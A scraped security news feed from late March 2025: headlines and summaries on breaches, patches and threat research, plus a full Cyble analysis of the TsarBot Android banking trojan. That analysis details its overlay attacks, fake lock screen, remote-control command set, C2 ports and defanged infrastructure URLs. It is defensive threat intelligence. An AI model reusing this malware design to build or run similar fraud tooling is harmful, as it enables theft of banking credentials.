In January 2025, Ivanti disclosed two critical vulnerabilities affecting their products. Darktrace detected exploitation of these vulnerabilities as early as December 2024.
by Darktrace
2025-03-28 16:46:02
Survey findings: AI Cyber Threats are a Reality, the People are Acting Now
Part 2/4: Darktrace releases insights on the State of AI in cybersecurity. This blog discusses AI’s impact on the cyber threat landscape.
by Darktrace
2025-03-28 16:30:27
Survey Findings: AI Cybersecurity Priorities and Objectives in 2025
Part 4/4: Darktrace shared new insights in the annual State of AI Cybersecurity report. This blog explores its findings on defenders’ priorities and objectives going into 2025. Discover the latest trends of major obstacles and the plans to overcome them by downloading the full report.
by Darktrace
2025-03-28 16:30:14
Cyberhaven Supply Chain Attack: Exploiting Browser Extensions
In late 2024, Darktrace detected unusual activity linked to Cyberhaven's Chrome browser extension. Read more about Darktrace’s investigation here.
by Darktrace
2025-03-28 16:29:59
Darktrace Recognized as the Only Visionary in the 2025 Gartner® Magic Quadrant™ for CPS Protection Platforms
Darktrace is proud to announce that we’ve been named the only Visionary in the inaugural Gartner® Magic Quadrant™ for Cyber-Physical Systems (CPS) Protection Platforms. Read the blog to find out why!
by Darktrace
2025-03-28 16:22:59
Again and again, NSO Group’s customers keep getting their spyware operations caught
Despite the stealthy nature of spyware, security researchers keep detecting Pegasus spyware attacks in part because of sloppy 'operational security.'
by TechCrunch
2025-03-28 15:45:00
Product Walkthrough: How Datto BCDR Delivers Unstoppable Business Continuity
Long gone are the days when a simple backup in a data center was enough to keep a business secure. While backups store information, they do not guarantee business continuity during a crisis. With IT disasters far too common and downtime burning through budgets, modern IT environments require solutions that go beyond storage and enable instant recovery to minimize downtime and data loss. This is
by The Hacker News
2025-03-28 14:42:00
The best VPN for Mac in 2025: Expert tested and reviewed
Mac VPNs are privacy tools to enhance your online privacy and security. These are our top VPN recommendations for Mac users who want to hide their activities.
by ZDNET Security
2025-03-28 14:09:00
Microsoft's passwordless future is here for Outlook, Xbox, 365, and more
Microsoft's new sign-in screens push you to finally ditch passwords - here's how.
by ZDNET Security
2025-03-28 14:00:00
Navigating Cyber-Risks and New Defenses
Digital transformation has revolutionized industries with critical infrastructure — but it has also introduced new vulnerabilities.
by Dark Reading
2025-03-28 13:45:00
5 Chromecast tricks to unlock your TV's full potential (including a hidden streaming hack)
Google's trusty casting device has been around for over a decade, and while its days are numbered, it still does more than just stream your favorite shows.
by ZDNET Security
2025-03-28 13:40:48
Broken access control: The leading OWASP Top 10 security risk
Application security flaws classified as broken access control weaknesses are the most impactful risk category in the OWASP Top 10. This article shows how attackers can exploit access control gaps, lists high-profile data breaches caused by such attacks, and gives best practices for preventing and mitigating broken access control vulnerabilities.
by Invicti
2025-03-28 13:36:00
PJobRAT Malware Campaign Targeted Taiwanese Users via Fake Chat Apps
An Android malware family previously observed targeting Indian military personnel has been linked to a new campaign likely aimed at users in Taiwan under the guise of chat apps. "PJobRAT can steal SMS messages, phone contacts, device and app information, documents, and media files from infected Android devices," Sophos security researcher Pankaj Kohli said in a Thursday analysis. PJobRAT, first
by The Hacker News
2025-03-28 13:12:20
Everybody's Gaming the Job Market With AI
Behold a perverse system where employers come to value those who can manipulate their hiring tech.
by ITPro Today
2025-03-28 13:08:16
Top 5 Web Application Penetration Testing Companies UK
Web Application Penetration Testing (WAPT) is a methodical approach to security that involves ethical hackers simulating real-world cyber-attacks on your web application to uncover vulnerabilities. By mimicking the tactics of cybercriminals, these professionals can identify weaknesses before malicious actors can exploit them. This proactive process allows businesses to address security flaws early and maintain a […]
by IT Security Guru
2025-03-28 12:59:09
Download and Install PowerShell 7
This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.
Introduction to PowerShell 7
PowerShell 7 is a modern, cross-platform (Windows, macOS, and Linux) automation and configuration management tool that builds on the features of Windows PowerShell. It is based on the .NET Core runtime, unlike previous versions of PowerShell that relied on the Windows-only .NET Framework. This shift has allowed for significant improvements in … Continued
by Netwrix
2025-03-28 12:42:24
4 Tips For Crypto Wallet Security
Cryptocurrency will be more popular in 2025 than it has ever been, and this means that there is a greater need for wallet security. As the crypto sector becomes more profitable and popular, malicious actors will look to exploit investors and steal their funds through methods like phishing schemes, wallet hacks, and so on. Then […]
by IT Security Guru
2025-03-28 12:33:16
TsarBot: A New Android Banking Trojan Targeting Over 750 Banking, Finance, and Cryptocurrency Applications

Key Takeaways
A new Android banking trojan, TsarBot, targets over 750 applications globally, including banking, finance, cryptocurrency, and e-commerce apps.
TsarBot spreads via phishing sites masquerading as legitimate financial platforms and is installed through a dropper disguised as Google Play Services.
It uses overlay attacks to steal banking credentials, credit card details, and login credentials by displaying fake login pages over legitimate apps.
TsarBot can record and remotely control the screen, executing fraud by simulating user actions such as swiping, tapping, and entering credentials while hiding malicious activity behind a black overlay screen.
It captures device lock credentials using a fake lock screen to gain full control of the device.
TsarBot communicates with its C&C server over WebSocket across multiple ports to receive commands, send stolen data, and dynamically execute on-device fraud.

Overview
Cyble Research and Intelligence Labs (CRIL) discovered a new Android banking trojan that uses an overlay attack to target over 750 applications, including banking, finance, cryptocurrency, payment, social media, and e-commerce applications, across multiple regions. While the malware mainly relies on overlay attacks to steal credentials, it also carries out various other malicious actions. It is capable of recording and remotely controlling the screen, enabling attackers to monitor and manipulate the device. Additionally, it employs lock-grabbing techniques, keylogging, and SMS interception. The analyzed samples indicate the presence of a newly discovered banking trojan, which we are internally tracking as "TsarBot," a name chosen due to the threat actor's suspected Russian origin.
During our investigation, we identified multiple log entries in Russian within the malicious application, suggesting that a Russian-speaking threat actor likely developed the malware.

Figure 1 – Logs in the Russian language

TsarBot has been observed spreading through a phishing site that impersonates the official Photon Sol website. The phishing site deceptively offers a download option for an application to start trading, whereas the legitimate website has no such option. The following phishing sites impersonate legitimate entities and distribute dropper applications that, once installed on the targeted device, deploy TsarBot:
hxxps://solphoton[.]io
hxxps://solphoton[.]app
hxxps://cashraven[.]online

Figure 2 – Phishing site distributing TsarBot
Figure 3 – Phishing site distributing TsarBot

Technical Details
As previously mentioned, the phishing site delivers a dropper application that stores the TsarBot APK file, implant.apk, in the "res/raw" folder. The dropper uses a session-based package installer to deploy the TsarBot malware on the device.

Figure 4 – Dropper installing TsarBot

TsarBot disguises itself as the Google Play Services app and does not display a launcher icon. Upon installation, it presents a fake Google Play Services update page, prompting the user to enable Accessibility services.

Figure 5 – Malware prompting victims to enable Accessibility services

WebSocket Connection
After the victim enables the Accessibility service, the malware establishes a socket connection with the C&C server "hxxp://95.181[.]173.76" using the four ports listed below:
9001 – To receive commands
9002 – To send captured screen content
9004 – To receive a different set of commands
9030 – To send data to the server

TsarBot can receive various commands from the server, primarily focused on screen control, enabling it to carry out on-device fraud.
Commands received on port 9001
REQUEST_CAPTURE – Prompts the user to allow screen capturing and initiates screen recording
CLICK_DESCRIPTION – Clicks the on-screen element with the given content description
CLICK_TEXT – Clicks the given text present on the screen
SWIPE_RIGHT – Performs a swipe-right gesture
TAP – Taps on the screen
BACK – Navigates back to the previous screen
HOME – Navigates to the home screen
RECENT_APPS – Opens the recent apps screen
CLICK_NEAR_TEXT – Clicks the button near the given text
CLICK_INDEX – Finds the clickable object at the given index and performs a click
ZOOM_IN – Zooms in on the screen
TAP_COORDINATES – Taps the given coordinates on the screen
SWIPE_UP – Performs a swipe-up gesture
SWIPE_DOWN – Performs a swipe-down gesture
SWIPE_LEFT – Performs a swipe-left gesture
LAUNCH_APP – Launches an app
ZOOM_OUT – Zooms out on the screen

Commands received on port 9004
click_by_text – Clicks the element matching the given text
stop_sending_tree – Stops sending keylogs
swipe_up – Performs a swipe-up gesture
tap – Performs a tap gesture
home – Navigates to the home screen
hide_black_overlay – Removes the black overlay from the screen
swipe_down – Performs a swipe-down gesture
swipe_left – Performs a swipe-left gesture
show_black_overlay – Displays a black overlay on the screen
swipe_right – Performs a swipe-right gesture
recents – Opens the recent apps screen
start_sending_tree – Starts sending keylogs
paste_text – Pastes text into the edit field on the screen

Screen Recording
As outlined in the command table, when TsarBot receives the "REQUEST_CAPTURE" command, it prompts the user to grant screen capture permission. Once granted, the malware starts the screen capture service, transmitting the captured screen content to the C&C server via a WebSocket connection on port 9002.

Figure 6 – Screen capture service

By capturing screen content and executing server-issued screen control commands, TsarBot can carry out fraudulent transactions on the targeted device while concealing the activity behind a black overlay screen.
Lock Grabber
TsarBot incorporates a LockTypeDetector feature to determine the device's lock type using the Accessibility service. It detects specific on-screen text or descriptions, such as "PIN area," "Device password," or a pattern, to identify the lock method. Once identified, it saves the lock type for future use in lock-grabbing operations.

Figure 7 – Lock type detection code

When TsarBot receives the "USER_PRESENT" action for the first time, it loads a fake lock screen matching the detected lock type from "hxxps://xdjhgfgjh[.]run/injects/htmlPIN/android.PinCode.html" and captures the user's lock password, PIN, or pattern.

Figure 8 – Malware loading fake lock screen

Overlay Attack
TsarBot connects to the URL "hxxps://xdjhgfgjh[.]run/injects/ServiceName.txt" to retrieve a list of targeted application package names. Most of these belong to banking apps from various regions, including France, Poland, the UK, India, the UAE, and Australia. The remaining package names are associated with e-commerce, social media, messaging, cryptocurrency, and other categories.

Figure 9 – TsarBot receiving the target application package names

TsarBot collects the list of applications installed on the infected device and compares it against the package names received from the server, maintaining a target list for overlay attacks.

Figure 10 – Malware comparing installed application package names with the target list received from the server

When the victim interacts with an application, TsarBot checks its package name against the maintained target list. If the application is in the target list, it retrieves the corresponding injection page from "hxxps://xdjhgfgjh[.]run/injects/html/{packagename}.html" and loads it into a WebView.
Figure 11 – Creating an overlay window on top of the targeted application

The injection page mimics the legitimate application, tricking users into entering sensitive information such as net banking credentials, login details, and credit card information. The figure below shows the injection page for one of the targeted applications.

Figure 12 – Injection page for Indian Bank prompting the user to enter login and credit card details

The data entered into the injection phishing pages is sent to the C&C server over port 9030. After transmitting the stolen information, TsarBot removes the targeted application's package name from the list to prevent the overlay from being triggered again for the same app.

Figure 13 – Sending collected login and credit card information from the overlay activity to the C&C server
Figure 14 – Removing the application package name from the target list

The image below shows the injection pages used by TsarBot to trick victims into submitting sensitive information while attempting to access genuine applications.

Figure 15 – Injection pages for different applications

Conclusion
TsarBot is yet another addition to the growing list of Android banking trojans, relying on familiar yet effective tactics such as overlay attacks, screen recording, and lock grabbing. By abusing Accessibility services and WebSocket communication, it enables on-device fraud while maintaining a low profile. With its ability to target over 750 applications across multiple sectors, TsarBot underscores the persistent threat posed by banking malware. Users should exercise caution when installing apps, avoid untrusted sources, and remain vigilant against phishing sites distributing such threats.

Our Recommendations
We have listed some essential cybersecurity best practices that create the first line of control against attackers.
We recommend that our readers follow the best practices given below:
Download and install software exclusively from official application stores, such as the Google Play Store or the iOS App Store.
Use a reputable antivirus and internet security software package on all connected devices, including personal computers, laptops, and mobile devices.
Implement strong passwords and enforce multi-factor authentication wherever feasible.
Activate biometric security features, such as fingerprint or facial recognition, for unlocking mobile devices when available.
Exercise caution when opening links sent via SMS or email on your mobile device.
Ensure that Google Play Protect is enabled on Android devices.
Be judicious when granting permissions to applications.
Keep your devices, operating systems, and applications updated.

MITRE ATT&CK® Techniques (Tactic – Technique (ID): Procedure)
Initial Access (TA0027) – Phishing (T1660): Malware is distributed via phishing sites
Persistence (TA0028) – Event-Triggered Execution: Broadcast Receivers (T1624.001): TsarBot listens for the BOOT_COMPLETED intent to automatically launch after the device restarts
Defense Evasion (TA0030) – Masquerading: Match Legitimate Name or Location (T1655.001): Malware pretends to be a genuine application
Defense Evasion (TA0030) – Application Discovery (T1418): Collects the installed application package name list to identify targets
Defense Evasion (TA0030) – Hide Artifacts: Suppress Application Icon (T1628.001): Hides the application icon
Defense Evasion (TA0030) – Input Injection (T1516): Malware can mimic user interaction, perform clicks and various gestures, and input data
Credential Access (TA0031) – Input Capture: Keylogging (T1417.001): TsarBot can collect credentials via keylogging
Collection (TA0035) – Protected User Data: SMS Messages (T1636.004): Collects SMS messages
Collection (TA0035) – Screen Capture (T1513): Malware records the screen using Media Projection
Command and Control (TA0037) – Application Layer Protocol: Web Protocols (T1437.001): TsarBot uses HTTP to communicate with the C&C server
Exfiltration (TA0036) – Exfiltration Over C2 Channel (T1646): Sends exfiltrated data over the C&C channel
by CYBLE
2025-03-28 12:31:27
Mozilla patches Firefox bug ‘exploited in the wild,’ similar to bug attacking Chrome
The bug fix comes days after Google fixed a similar vulnerability under attack in its Chrome browser.
by TechCrunch
2025-03-28 12:21:00
Cybersecurity firms brace for impact of potential Oracle Cloud breach
As evidence continues to pile up, security providers warn customers to secure networks.
by Cybersecurity Dive
2025-03-28 12:00:00
SEC should avoid ‘overly prescriptive’ AI rules, acting chair says
The comments follow actions taken by President Trump that have effectively upended the U.S. approach to AI policy under Biden, according to analysts.
by Cybersecurity Dive
2025-03-28 11:36:00
Nine-Year-Old npm Packages Hijacked to Exfiltrate API Keys via Obfuscated Scripts
Cybersecurity researchers have discovered several cryptocurrency packages on the npm registry that have been hijacked to siphon sensitive information such as environment variables from compromised systems. "Some of these packages have lived on npmjs.com for over 9 years, and provide legitimate functionality to blockchain developers," Sonatype researcher Ax Sharma said. "However, [...] the latest
by The Hacker News
2025-03-28 11:33:00
Countering nation-state cyber espionage: A CISO field guide
The rise of DeepSeek has prompted the usual well-documented concerns around AI, but also raised worries about its potential links to the Chinese state. The Security Think Tank considers the steps security leaders can take to counter threats posed by nation-state industrial espionage.
by ComputerWeekly
2025-03-28 11:17:38
The AI Race to Modernize Mainframes Has Begun
COBOL remains a major obstacle to digital transformation. As AI revolutionizes software development, can it finally conquer COBOL's complexities and modernize legacy systems?
by ITPro Today
2025-03-28 11:14:00
Mozilla Patches Critical Firefox Bug Similar to Chrome’s Recent Zero-Day Vulnerability
Mozilla has released updates to address a critical security flaw impacting its Firefox browser for Windows, merely days after Google patched a similar flaw in Chrome that came under active exploitation as a zero-day. The security vulnerability, CVE-2025-2857, has been described as a case of an incorrect handle that could lead to a sandbox escape. "Following the recent Chrome sandbox escape (
by The Hacker News
2025-03-28 10:25:26
Who Pays for Open Source Software? Uncovering Hidden Costs and Funding Models
Open source software may be free to use, but creating and maintaining it often incurs significant costs. Here are four approaches to paying for open source software development.
by ITPro Today
2025-03-28 10:00:06
Gamaredon campaign abuses LNK files to distribute Remcos backdoor
Cisco Talos is actively tracking an ongoing campaign, active since at least November 2024, targeting users in Ukraine with malicious LNK files that run a PowerShell downloader.
by Cisco Talos Blog
2025-03-28 09:37:13
Fortresses of Old and New: From Medieval Castle Sieges to Modern-Day Cyber Attacks
Is cybersecurity as complex as it seems? As CEO of BlockAPT, I have often found that cybersecurity is perceived as overwhelmingly complex. The sheer volume of tools, terminology, and evolving threats can make it seem impenetrable to those who aren’t technical experts. […]
by BlockAPT
2025-03-28 09:00:00
Cybersecurity Snapshot: NIST Details Attacks Against AI, Recommends Defenses, While ETSI Issues Quantum-Resistant Crypto StandardCheck out NIST’s comprehensive taxonomy of cyberattacks against AI systems, along with mitigation recommendations. Plus, organizations have another cryptographic algorithm for protecting data against future quantum attacks. And get the latest on the IngressNightmare vulnerabilities, and on cyber risks impacting commercial satellites and domain registrars.Dive into five things that are top of mind for the week ending March 28.1 - NIST categorizes attacks against AI systems, offers mitigationsOrganizations deploying artificial intelligence (AI) systems must be prepared to defend them against cyberattacks — not a simple task.Recognizing this challenge, the U.S. government this week published a report to help organizations identify, address and manage cyber risks faced by AI systems.Titled “Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations (NIST AI 100-2)” and published by the U.S. National Institute of Standards and Technology, the 127-page report also offers:A taxonomy of adversarial machine-learning (AML) attacks, such as evasion, poisoning, and privacy attacks against both predictive AI systems and generative AI systems; and of AML attacks targeting learning methodsPotential mitigations against AML attacks, as well as the limitations of these mitigationsStandardized AML terminology, along with an index and a glossary“Despite the significant progress of AI and machine learning in different application domains, these technologies remain vulnerable to attacks,” reads a NIST statement. 
“The consequences of attacks become more dire when systems depend on high-stakes domains and are subjected to adversarial attacks.”For example, to mitigate supply chain attacks against generative AI systems, NIST recommendations include:Verify that data downloaded from the web for training AI models hasn’t been tampered with: Do a basic integrity check in which the data provider publishes cryptographic hashes and the downloader verifies the training data.Perform data filtering to try to remove poisoned data samples.Do vulnerability scans of model artifacts.Use mechanistic interpretability methods to identify backdoor features.Design generative AI applications in such a way as to reduce the impact of model attacks.Taxonomy of Attacks on GenAI Systems(Source: “Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations” report from NIST, March 2025)The report is primarily aimed at those in charge of designing, developing, deploying, evaluating and governing AI systems.For more information about protecting AI systems against cyberattacks:“Understanding the risks - and benefits - of using AI tools” (U.K. NCSC)“Hacking Poses Risks for Artificial Intelligence” (Georgetown University)“Attacking Artificial Intelligence: AI’s Security Vulnerability and What Policymakers Can Do About It” (Harvard University)“How Safe and Secure Is GenAI Really?” (InformationWeek)“Hacking AI? 
Here are 4 common attacks on AI” (ZDNet)“Adversarial attacks on AI models are rising: what should you do now?” (VentureBeat)2 - ETSI releases new post-quantum cryptographic standardAnd the world has yet another cryptographic algorithm standard designed to protect data against future attacks powered by mighty quantum computers.Called Covercrypt, the quantum-resistant standard specification secures data not only against forthcoming quantum attacks, but also against current pre-quantum attacks, the European Telecommunications Standards Institute (ETSI) announced this week.Specifically, Covercrypt defines a scheme for key encapsulation mechanisms with access control (KEMAC) in which session keys are locked based on users’ attributes. “For instance, while an IT department can define who enters applications, the ETSI KEMAC standard helps to determine who can decrypt the data inside those applications through a specific access policy,” reads an ETSI statement. To get more details, check out ETSI’s Covercrypt technical specification.Earlier this month, NIST picked its fifth algorithm for post-quantum encryption, which it expects will be widely available for use in 2027. NIST released three quantum-resistant algorithm standards last year and expects to release a fourth one in 2026.Here’s the issue: Quantum computers, which are expected to become widely available at some point between 2030 and 2040, will be able to decrypt data protected with today’s public-key cryptographic algorithms. Consequently, organizations need to start migrating to post-quantum cryptography, a process that requires careful planning and deployment.To help organizations plan their migration to quantum-resistant cryptography, this month NIST published a draft white paper titled “Considerations for Achieving Crypto Agility,” while the U.K. 
National Cyber Security Centre (NCSC) released “Timelines for migration to post-quantum (PQC) cryptography.” For more information about how to protect your organization against the quantum computing cyberthreat:“How to prepare for a secure post-quantum future” (TechTarget)“Moody’s sounds alarm on quantum computing risk, as transition to PQC ‘will be long and costly’” (Industrial Cyber)“Companies Prepare to Fight Quantum Hackers” (The Wall Street Journal)“US unveils new tools to withstand encryption-breaking quantum. Here''s what experts are saying” (World Economic Forum)“Quantum is coming — and bringing new cybersecurity threats with it” (KPMG)“Quantum and the Threat to Encryption” (SecurityWeek)3 - U.K.’s NCSC urges domain registrars to shore up securityLax security practices among domain registrars and domain-name system (DNS) operators help cyber fraudsters carry out online scams, including phishing campaigns.For that reason, it’s critical that domain sellers and owners tighten their security practices, the U.K. 
National Cyber Security Centre (NCSC) warned this week.“To enable phishing in the first place, malicious actors rely on obtaining misleading and fraudulent domains, or taking over legitimate domain names at scale,” reads the new NCSC guidance “Good security practice for domain registrars.” The guidance is aimed at registrars that sell domains at scale, as well as at organizations that buy and park domains as investments or as part of brand-protection efforts.The NCSC’s security recommendations include:Verify the customer’s information, such as IP address, email address, phone number and payment information; and check it against available threat intelligence.Use a system that automatically flags misleading domain-name registrations that aim to deceptively align themselves with well-known brands.Make it difficult for attackers to tamper with and hijack domains by adopting security controls like multi-factor authentication and automated domain-change notifications.For more information about DNS security:“How To Reduce DNS Infrastructure Risk To Secure Your Cloud Attack Surface” (Tenable)“What is DNS Cache Poisoning?” (TechTarget)“10 Dangerous DNS Attacks Types & Prevention Measures” (Cybersecurity News)“Attackers target the Domain Name System, the internet’s phone book. Here’s how to fight back” (SiliconAngle)“The 5 big DNS attacks and how to mitigate them” (Network World)4 - ENISA: Commercial satellites need better cyber protectionsMakers of commercial satellites face critical cyberthreats from a variety of attackers, including hacktivists, nation-state actors and cybercriminals, so they need to boost their cyber defenses.That’s according to the European Union Agency for Cybersecurity (ENISA), which this week published “Space Threat Landscape,” a report that recommends cybersecurity controls and cyberattack mitigations to space-sector organizations.“The commercial exploitation of space has become the backbone of key economic activities. 
Digital threats in space are therefore highly critical. … This is why commercial satellites must be cyber secured at all cost,” Juhan Lepassaar, ENISA’s Executive Director, said in a statement.Services provided by commercial satellites include telecommunications, financial transactions, television broadcasts, GPS navigation, weather monitoring and more, which is why breaches impacting them in recent years have been highly disruptive.Cybersecurity challenges faced by commercial satellite makers include:Risk to their supply chains, which are global and highly complexWidespread use of commercial off-the-shelf componentsPrevalence of legacy systems and limited IT asset visibility, both aggravated by the remote location of space systemsWeak configurations, particularly due to insufficient use of cyrptographyHuman error, magnified by the need for significant human interaction with space systemsThreat of sophisticated cyberattacksENISA’s mitigation recommendations include:Bake security into the design of systems and networks.Regularly patch software vulnerabilities, prioritizing the ones that pose the greater risk to your organization.Share information about vulnerabilities, threats and attack tactics, techniques and procedures with your industry peers.Secure your supply chain by carefully and methodically vetting vendors and partners; and by continuously monitoring their security processes. 
- Be aware of fraudulent equipment circulating in the global supply chain.
- Rigorously test the security of commercial off-the-shelf products and components.
- Adopt “effective, validated and tested” encryption methods to protect your systems and data.

For more information about the cybersecurity of commercial satellites:
- “We Need Cybersecurity in Space to Protect Satellites” (Scientific American)
- “Orbital observations: Enhancing space resilience with real-time cybersecurity” (Deloitte)
- “The Growing Risk of a Major Satellite Cyber Attack” (Via Satellite)
- “Recommendations to Space System Operators for Improving Cybersecurity” (CISA)
- “A Cybersecurity Framework for Mitigating Risks to Satellite Systems” (Dark Reading)

5 - New vulns disclosed, patched for Ingress NGINX Controller for Kubernetes

Does your organization use the Ingress NGINX Controller for Kubernetes? If so, your IT and cybersecurity departments are hopefully aware of five vulnerabilities disclosed this week affecting this popular open-source controller used for managing Kubernetes clusters’ network traffic. One vulnerability has a “critical” severity rating, while three are rated “high.” The Kubernetes open source project fixed all of the vulnerabilities — collectively known as IngressNightmare — with the release of two new versions of the product: Ingress NGINX Controller 1.12.1, which fixes version 1.12.0; and Ingress NGINX Controller 1.11.5, which fixes older versions, starting with 1.11.4.

To get all the details, check out Tenable Research’s blog “CVE-2025-1097, CVE-2025-1098, CVE-2025-1974, CVE-2025-24513, CVE-2025-24514: Frequently Asked Questions About IngressNightmare.”
by Tenable
2025-03-28 08:46:19
Protecting Android, Windows, and Linux devices against being tracked via the Find My network | Kaspersky official blog
The nRootTag attack leverages the Apple network to track other vendors' Android, Windows and Linux devices. Learn how this is possible and how to protect yourself from the attack.
by Kaspersky
2025-03-28 07:29:26
Stealing user credentials with evilginx
A malevolent mutation of the widely used nginx web server facilitates Adversary-in-the-Middle action, but there’s hope
by Sophos News
2025-03-28 06:00:00
Iran's MOIS-Linked APT34 Spies on Allies Iraq & Yemen
The Islamic Republic is keeping its enemies close and its friends closer, with espionage attacks aimed at nearby neighbors.
by Dark Reading
2025-03-28 00:00:00
Kubernetes IngressNightmare Vulnerabilities: What You Need to Know
by CrowdStrike
2025-03-28 00:00:00
[webapps] Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass
by Exploit DB
2025-03-28 00:00:00
[webapps] Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
by Exploit DB
2025-03-28 00:00:00
[webapps] Sonatype Nexus Repository 3.53.0-01 - Path Traversal
by Exploit DB
2025-03-28 00:00:00
[webapps] CodeCanyon RISE CRM 3.7.0 - SQL Injection
by Exploit DB
2025-03-28 00:00:00
[webapps] Litespeed Cache 6.5.0.1 - Authentication Bypass
by Exploit DB
2025-03-28 00:00:00
Apache Tomcat: CVE-2025-24813
Learn about CVE-2025-24813 affecting Apache Tomcat products. Patch now to prevent remote code execution.
by Recorded Future
2025-03-28 00:00:00
MCP: An Introduction to Agentic Op Support
1.1 Introduction
Agents and Large Language Models (LLMs) offer a powerful combination for driving automation. In this post, we’ll explore how to implement a straightforward agent that leverages the capabilities of…
by TrustedSec
2025-03-27 22:28:00
New Morphing Meerkat Phishing Kit Mimics 114 Brands Using Victims’ DNS Email Records
Cybersecurity researchers have shed light on a new phishing-as-a-service (PhaaS) platform that leverages the Domain Name System (DNS) mail exchange (MX) records to serve fake login pages that impersonate about 114 brands. DNS intelligence firm Infoblox is tracking the actor behind the PhaaS, the phishing kit, and the related activity under the moniker Morphing Meerkat. "The threat actor behind
by The Hacker News
2025-03-27 21:47:31
Even More Venmo Accounts Tied to Trump Officials in Signal Group Chat Left Data Public
WIRED has found four new Venmo accounts that appear to be associated with Trump officials who were in an infamous Signal chat. One made a payment with a note consisting solely of an eggplant emoji.
by WIRED Security News
2025-03-27 21:43:28
Hoff's Rule: People First
Dark Reading Confidential Episode 5: Christofer Hoff, chief secure technology officer at LastPass, shares the human side of the story of how he led his team through a major cyber incident and built from the ground up a security team and security culture.
by Dark Reading
2025-03-27 21:07:44
Report: Phishing Remains the Most Prevalent Cyber Threat
INKY has published its annual report on email security, finding that phishing accounted for 30% of all reported cybercrimes last year.
by KnowBe4
2025-03-27 20:58:26
Sophos ranked #1 overall for Firewall, MDR, and EDR in the G2 Spring 2025 Reports
Also ranked the top solution across 53 global reports.
by Sophos News
2025-03-27 20:21:27
How CISA Cuts Impact Election Security
State and federal security experts weighed in on the impact that budgetary and personnel cuts to CISA will have on election security as a whole.
by Dark Reading
2025-03-27 20:13:56
OpenAI Bumps Up Bug Bounty Reward to $100K in Security Update
The artificial intelligence research company previously had its maximum payout set at $20,000 before exponentially raising the reward.
by Dark Reading
2025-03-27 19:40:00
Hackers Repurpose RansomHub's EDRKillShifter in Medusa, BianLian, and Play Attacks
A new analysis has uncovered connections between affiliates of RansomHub and other ransomware groups like Medusa, BianLian, and Play. The connection stems from the use of a custom tool that's designed to disable endpoint detection and response (EDR) software on compromised hosts, according to ESET. The EDR killing tool, dubbed EDRKillShifter, was first documented as used by RansomHub actors in
by The Hacker News
2025-03-27 19:08:05
PowerShell Grep Command
This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell. Grep (Global Regular Expression print) command is a powerful text searching utility in Unix/Linux systems. Grep takes a pattern such as a regular expression or string and searches one or more input files for the lines that contain the expected pattern. Grep command can be significantly used for text searching and filtering, log analysis, code … Continued
by Netwrix
2025-03-27 18:31:30
SignalGate Is Driving the Most US Downloads of Signal Ever
Scandal surrounding the Trump administration’s Signal group chat has led to a landmark week for the encrypted messaging app’s adoption—its “largest US growth moment by a massive margin.”
by WIRED Security News
2025-03-27 18:01:38
Money Laundering 101, and why Joe is worried
In this blog post, Joe covers the very basics of money laundering, how it facilitates ransomware cartels, and what the regulatory future holds for cybercrime.
by Cisco Talos Blog
2025-03-27 18:01:00
APT36 Spoofs India Post Website to Infect Windows and Android Users with Malware
An advanced persistent threat (APT) group with ties to Pakistan has been attributed to the creation of a fake website masquerading as India's public sector postal system as part of a campaign designed to infect both Windows and Android users in the country. Cybersecurity company CYFIRMA has attributed the campaign with medium confidence to a threat actor called APT36, which is also known as
by The Hacker News
2025-03-27 17:58:00
Fullz for sale: What it means for your security posture
“Fullz” is a slang term used by cybercriminals trading in stolen data. It refers to data packages that contain full sets of data needed to steal someone’s identity.
by Barracuda
2025-03-27 16:55:00
New Report Explains Why CASB Solutions Fail to Address Shadow SaaS and How to Fix It
Whether it’s CRMs, project management tools, payment processors, or lead management tools - your workforce is using SaaS applications by the pound. Organizations often rely on traditional CASB solutions for protecting against malicious access and data exfiltration, but these fall short for protecting against shadow SaaS, data damage, and more. A new report, Understanding SaaS Security Risks: Why
by The Hacker News
2025-03-27 16:53:36
DoJ Recovers $5M Lost in BEC Fraud Against Workers' Union
The union received a spoofed email that led to the loss of $6.4 million, much of it transferred to other accounts or to a cryptocurrency exchange.
by Dark Reading
2025-03-27 16:49:00
New security requirements adopted by HTTPS certificate industry

Posted by Chrome Root Program, Chrome Security Team

The Chrome Root Program launched in 2022 as part of Google’s ongoing commitment to upholding secure and reliable network connections in Chrome. We previously described how the Chrome Root Program keeps users safe, and described how the program is focused on promoting technologies and practices that strengthen the underlying security assurances provided by Transport Layer Security (TLS). Many of these initiatives are described on our forward-looking, public roadmap named “Moving Forward, Together.”

At a high level, “Moving Forward, Together” is our vision of the future. It is non-normative and considered distinct from the requirements detailed in the Chrome Root Program Policy. It’s focused on themes that we feel are essential to further improving the Web PKI ecosystem going forward, complementing Chrome’s core principles of speed, security, stability, and simplicity. These themes include:
- Encouraging modern infrastructures and agility
- Focusing on simplicity
- Promoting automation
- Reducing mis-issuance
- Increasing accountability and ecosystem integrity
- Streamlining and improving domain validation practices
- Preparing for a "post-quantum" world

Earlier this month, two “Moving Forward, Together” initiatives became required practices in the CA/Browser Forum Baseline Requirements (BRs). The CA/Browser Forum is a cross-industry group that works together to develop minimum requirements for TLS certificates. Ultimately, these new initiatives represent an improvement to the security and agility of every TLS connection relied upon by Chrome users. If you’re unfamiliar with HTTPS and certificates, see the “Introduction” of this blog post for a high-level overview.
Multi-Perspective Issuance Corroboration

Before issuing a certificate to a website, a Certification Authority (CA) must verify the requestor legitimately controls the domain whose name will be represented in the certificate. This process is referred to as "domain control validation" and there are several well-defined methods that can be used. For example, a CA can specify a random value to be placed on a website, and then perform a check to verify the value’s presence has been published by the certificate requestor.

Despite the existing domain control validation requirements defined by the CA/Browser Forum, peer-reviewed research authored by the Center for Information Technology Policy (CITP) of Princeton University and others highlighted the risk of Border Gateway Protocol (BGP) attacks and prefix-hijacking resulting in fraudulently issued certificates. This risk was not merely theoretical, as it was demonstrated that attackers successfully exploited this vulnerability on numerous occasions, with just one of these attacks resulting in approximately $2 million of direct losses.

Multi-Perspective Issuance Corroboration (referred to as "MPIC") enhances existing domain control validation methods by reducing the likelihood that routing attacks can result in fraudulently issued certificates. Rather than performing domain control validation and authorization from a single geographic or routing vantage point, which an adversary could influence as demonstrated by security researchers, MPIC implementations perform the same validation from multiple geographic locations and/or Internet Service Providers. This has been observed as an effective countermeasure against ethically conducted, real-world BGP hijacks.

